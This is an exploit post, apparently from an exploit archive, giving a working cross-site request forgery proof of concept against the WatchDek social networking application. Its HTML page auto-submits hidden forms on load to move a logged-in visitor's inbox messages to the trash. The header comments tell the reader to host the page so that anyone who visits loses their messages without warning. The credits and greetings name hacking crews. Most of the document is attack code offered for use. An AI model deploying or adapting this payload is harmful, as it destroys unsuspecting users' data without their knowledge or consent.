Watchdek Social Networking suffers from a cross site request forgery vulnerability.
ba4930650360a6bc521322cbbfa743f7d854183ede158d886bc22906824adef1
#(+) Exploit Title: WatchDek Social Networking XSRF Vulnerability (Force Delete Victim Inbox)
#(+) Author : ^Xecuti0n3r
#(+) Date : 7.04.2011
#(+) Hour : 13:37 PM
#(+) E-mail : xecutioner()yahoo.com
#(+) Category : Web Apps [XSRF]
#(+) App website: watchdek.com
#All you have to do is save the below code as exploit.html
#Then Host a website with the exploit.html file. Any person who visits the website
# will see that all the messages in his watchdek inbox is deleted without warning ;)
____________________________________________________________________
____________________________________________________________________
Code:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Watchdek Force Delete Victim Inbox</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 10;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<H2>Watchdek Force Delete Victim Inbox</H2>
<form method="POST" name="form3" action="http://localhost:80/index.php?option=com_jam&format=raw">
<input type="hidden" name="search" value=""/>
<input type="hidden" name="mid[]" value="501"/>
<input type="hidden" name="mid[]" value="500"/>
<input type="hidden" name="toggle" value="on"/>
<input type="hidden" name="controller" value="action"/>
<input type="hidden" name="view" value="inbox"/>
<input type="hidden" name="action" value="trash"/>
<input type="hidden" name="limitstart" value="0"/>
<input type="hidden" name="boxchecked" value="2"/>
<input type="hidden" name="attr" value=""/>
<input type="hidden" name="filter_tag" value=""/>
<input type="hidden" name="filter_order" value="m.datetime"/>
</form>
</body>
</html>
########################################################################
(+)Exploit Coded by: ^Xecuti0N3r
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
(+)Gr33ts to : -[SiLeNtp0is0n]- , 3thicaln00b, eXes0ul and all Friends at Indian Cyber Army & Indishell Crew
########################################################################